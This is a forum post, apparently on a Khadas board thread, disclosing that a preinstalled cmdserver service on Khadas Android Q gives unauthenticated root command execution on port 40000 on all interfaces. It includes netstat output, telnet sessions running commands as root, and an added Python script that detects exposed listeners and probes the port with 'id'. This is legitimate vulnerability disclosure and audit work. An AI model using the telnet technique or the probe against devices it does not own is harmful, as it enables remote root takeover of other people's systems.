Hi @tenk.wang, @jasonl, @goenjoy
Could you please point me to where the sources of the cmdclient and cmdserver binaries are in the Android source?
As far as I can understand, they ship as precompiled binaries with the Android Q source tree, and I'm a bit worried about leaving such a big security hole… as I see it, cmdserver exposes an open port and is the backend for cmdclient, which in turn allows executing anything with root privileges:
kvim3l:/system/bin # netstat -taup
Active Internet connections (established and servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program Name
tcp 0 0 0.0.0.0:40000 0.0.0.0:* LISTEN 4229/cmdserver
tcp6 0 0 :::5555 :::* LISTEN 3495/adbd
tcp6 0 0 ::ffff:192.168.1.7:5555 ::ffff:192.168.1.:52204 ESTABLISHED 3495/adbd
udp 0 0 192.168.1.7:bootpc 192.168.1.1:bootps ESTABLISHED 3678/system_server
udp 0 0 0.0.0.0:mdns 0.0.0.0:* 3540/mdnsd
udp 0 0 0.0.0.0:38125 0.0.0.0:* 3540/mdnsd
udp6 0 0 :::mdns :::* 3540/mdnsd
udp6 0 0 :::41445 :::* 3540/mdnsd
kvim3l:/system/bin $ cmdclient id
uid=0(root) gid=0(root) groups=0(root) context=u:r:cmdserver:s0
kvim3l:/system/bin $
I understand that it is used to perform khadasapi functions internally, but a port opened on all interfaces isn't something I'm happy my device is doing… perhaps it should be bound to localhost only (127.0.0.1); otherwise it is a nice chance to build a botnet out of Khadas devices.
It is so unprotected that it is a real security hole: a simple telnet client is enough to run any command on Khadas Android Q (which has cmdserver installed by default)… Here is a nice example of a telnet session from my workstation to my Khadas device (no password, no checks… a nice backdoor):
% telnet 192.168.1.7 40000
Trying 192.168.1.7...
Connected to 192.168.1.7.
Escape character is '^]'.
id
uid=0(root) gid=0(root) groups=0(root) context=u:r:cmdserver:s0
% telnet 192.168.1.7 40000
Trying 192.168.1.7...
Connected to 192.168.1.7.
Escape character is '^]'.
ls
acct
bin
boot
bugreports
cache
charger
config
d
data
default.prop
dev
etc
init
init.environ.rc
init.rc
init.recovery.amlogic.rc
init.usb.configfs.rc
init.usb.rc
init.zygote32.rc
lost+found
metadata
mnt
odm
oem
proc
product
sbin
sdcard
storage
sys
system
ueventd.rc
vendor
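An added example (not part of the original post or of the Khadas code) that automates the two checks the post does by hand: flag TCP listeners bound to a wildcard address in `netstat -taup` output, and send `id` to a suspected raw command port the way the telnet session does. The netstat sample is constructed from the lines in the post plus one loopback-bound line standing for the suggested fix; `CannedCmdServer` is a hypothetical stand-in that only returns a fixed reply so the probe can run offline, and it executes nothing.

```python
"""Audit helpers for an unauthenticated command port exposed on all interfaces."""
import re
import socket
import socketserver
import threading

# Constructed sample: netstat lines taken from the post, plus a final line showing
# what a cmdserver bound to loopback only (the suggested fix) would look like.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program Name
tcp 0 0 0.0.0.0:40000 0.0.0.0:* LISTEN 4229/cmdserver
tcp6 0 0 :::5555 :::* LISTEN 3495/adbd
tcp6 0 0 ::ffff:192.168.1.7:5555 ::ffff:192.168.1.:52204 ESTABLISHED 3495/adbd
tcp 0 0 127.0.0.1:40000 0.0.0.0:* LISTEN 4229/cmdserver
"""

WILDCARD_HOSTS = {"0.0.0.0", "::", "*"}


def exposed_tcp_listeners(netstat_text):
    """Return (program, port) for TCP sockets in LISTEN state bound to a wildcard address.

    Listeners on 127.0.0.1 / ::1 are reachable only from the device itself and are skipped.
    """
    found = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 7 or not fields[0].startswith("tcp") or fields[5] != "LISTEN":
            continue
        host, _, port = fields[3].rpartition(":")  # rpartition copes with IPv6 colons
        if host in WILDCARD_HOSTS:
            pid, _, prog = fields[6].partition("/")
            found.append((prog or pid, int(port)))
    return found


ID_RE = re.compile(r"uid=(\d+)\((\w+)\)")


def probe_command_port(host, port, timeout=3.0):
    """Send `id` to a raw TCP port and return (uid, name) from the reply, or None.

    Mirrors the manual telnet session: no banner, no authentication, a plain
    newline-terminated command. A root uid in the answer confirms the exposure.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        s.sendall(b"id\n")
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
                if b"\n" in data:
                    break
        except socket.timeout:
            pass
    m = ID_RE.search(b"".join(chunks).decode(errors="replace"))
    return (int(m.group(1)), m.group(2)) if m else None


class CannedCmdServer(socketserver.BaseRequestHandler):
    """Hypothetical stand-in for cmdserver: answers every command with a fixed `id`
    line (copied from the post) so the probe can be exercised offline. Runs nothing."""
    CANNED = b"uid=0(root) gid=0(root) groups=0(root) context=u:r:cmdserver:s0\n"

    def handle(self):
        self.request.recv(1024)  # read and discard the command
        self.request.sendall(self.CANNED)


def demo_probe():
    """Start the canned server on loopback, probe it, and return the probe result."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), CannedCmdServer)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return probe_command_port("127.0.0.1", srv.server_address[1])
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for prog, port in exposed_tcp_listeners(SAMPLE_NETSTAT):
        print(f"exposed on all interfaces: {prog} tcp/{port}")
    print("probe of canned server:", demo_probe())
```

Against a real device, run `exposed_tcp_listeners` on `adb shell netstat -taup` output and then `probe_command_port(<device-ip>, 40000)` from a host on the same network; a `(0, 'root')` answer is exactly the condition the post describes, and a listener reported on 127.0.0.1 rather than 0.0.0.0 is what the suggested fix should produce.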
@hyphop -
“Boss! We have a hole in our security!
Well, at least something of ours is secure.”